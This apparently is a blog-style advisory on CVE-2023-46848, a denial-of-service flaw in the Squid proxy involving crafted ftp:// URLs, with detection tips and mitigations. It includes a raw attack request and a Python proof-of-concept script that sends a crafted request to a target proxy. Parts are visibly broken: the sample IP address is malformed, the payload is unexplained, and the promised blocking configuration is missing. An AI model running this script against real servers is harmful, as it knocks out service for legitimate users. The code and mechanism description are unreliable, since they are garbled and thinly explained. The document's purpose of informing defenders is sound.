*Published: June 2024*
Summary:
CVE-2023-46848 is a Denial of Service (DoS) vulnerability in Squid, the popular open-source proxy and cache server. This vulnerability allows attackers to crash or hang Squid by sending specially crafted ftp:// URLs via HTTP requests or through FTP-native input. We'll break down how the issue works, see sample code, and explore both the risks and how to respond.
What Is Squid and Why Does CVE-2023-46848 Matter?
Squid is widely used for proxying, content filtering, and caching web content. Organizations rely on its speed and flexibility. Unfortunately, this very flexibility can sometimes expose attack surfaces—like what happened with CVE-2023-46848.
Official References
- CVE-2023-46848 at MITRE
- Squid Security Advisory
Understanding CVE-2023-46848
The vulnerability arises when Squid handles ftp:// URLs. A remote attacker, with no need for authentication, can send specially crafted HTTP requests containing ftp:// URLs or manipulate FTP-native input to generate such URLs.
When Squid processes these, it may crash or hang due to how it parses and manages memory for these URLs, causing a Denial of Service. This means legitimate users lose connectivity until the server is restarted or recovers.
1. The Dangerous HTTP Request
A remote attacker sends a simple HTTP GET request via a browser or a basic tool like curl or telnet, such as:
GET ftp://malicious.example.com/file.txt HTTP/1.1
Host: proxy-vulnerable.example.com
Alternatively, the attacker could use native FTP client commands in a way that Squid ends up constructing an internal ftp:// URL.
2. Squid Tries to Handle This
The vulnerable Squid proxy, by default, tries to interpret and process the ftp:// URL as if it were a normal HTTP request. The parsing logic, however, isn't designed to handle some edge cases or malformed URLs, and it ends up either consuming excessive resources (CPU, RAM) or encountering an unrecoverable error that crashes the process.
Below is a basic example using Python to send a targeted request to a vulnerable Squid proxy
import socket
proxy_host = "192..2.10" # Replace with target IP
proxy_port = 3128 # Default Squid port
request = (
"GET ftp://evil.attacker.com/%Acrashy HTTP/1.1\r\n"
f"Host: {proxy_host}\r\n"
"User-Agent: EvilPoC\r\n"
"Connection: close\r\n\r\n"
)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((proxy_host, proxy_port))
s.sendall(request.encode())
print("[*] Attack sent, waiting for server response...")
print(s.recv(4096).decode())
> NOTE: DO NOT USE THIS CODE AGAINST SYSTEMS YOU DO NOT OWN OR HAVE EXPLICIT PERMISSION TO TEST. This is for educational purposes only.
No authentication required: Anyone able to send requests to Squid can attempt this.
- Chaining: Could be used as a part of a larger attack (e.g., DoS combined with other vulnerabilities).
Logs: Squid may log warnings or backtraces just before it crashes.
- Behavior: Watch for repeated crashes, high CPU usage, or unusual traffic spikes with ftp:// URLs in requests.
Update Squid:
The Squid project has released a patch, and all users should update to the most recent version.
Network Filtering:
Block ftp:// URLs at your firewall or upstream filtering device.
`
Or, block requests containing ftp:// in URLs with custom ACLs.
Conclusion
CVE-2023-46848 is a good reminder that even mature, trusted infrastructure like Squid can have surprising vulnerabilities. If you run Squid, patch now. If you can't, use access control to limit risk.
Further Reading
- Squid Bugzilla: Bug 5267 – Denial of Service
- How Squid handles FTP
Timeline
Published on: 11/03/2023 08:15:08 UTC
Last modified on: 12/14/2023 10:15:08 UTC